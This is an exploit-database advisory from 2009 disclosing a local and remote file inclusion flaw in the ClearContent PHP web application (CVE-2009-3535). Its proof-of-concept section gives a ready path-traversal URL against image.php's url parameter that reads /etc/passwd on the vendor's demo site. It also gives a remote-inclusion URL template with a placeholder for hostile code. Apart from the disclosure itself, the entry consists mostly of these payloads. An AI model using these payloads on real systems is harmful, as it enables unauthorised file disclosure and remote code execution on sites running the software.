ClearContent - '/image.php?url' Local/Remote File Inclusion

Author: MizoZ
type: webapps
platform: php
port: 
date_added: 2009-07-08 
date_updated:  
verified: 1 
codes: OSVDB-55742;CVE-2009-3535 
tags: 
aliases:  
screenshot_url:  
application_url: 

----------------------------------------------------------------------------------------------------

  Name : ClearContent
  Site : http://www.allisclear.com/

  Demo : http://demo.allisclear.com/

----------------------------------------------------------------------------------------------------


  Found By : MizoZ [EvilWay Team]

  Made in  : Morocco
  Contact  : mizozx[at]gmail[dot]com
  Greetz   : Moudi , Zuka , All friends


----------------------------------------------------------------------------------------------------


  P0c:

    LFI: http://demo.allisclear.com/image.php?url=../../../../../../../../../../etc/passwd
    RFI: http://demo.allisclear.com/image.php?url=[EVIL_CODE]???


 RFI needs register_globals=on;

----------------------------------------------------------------------------------------------------

# milw0rm.com [2009-07-09]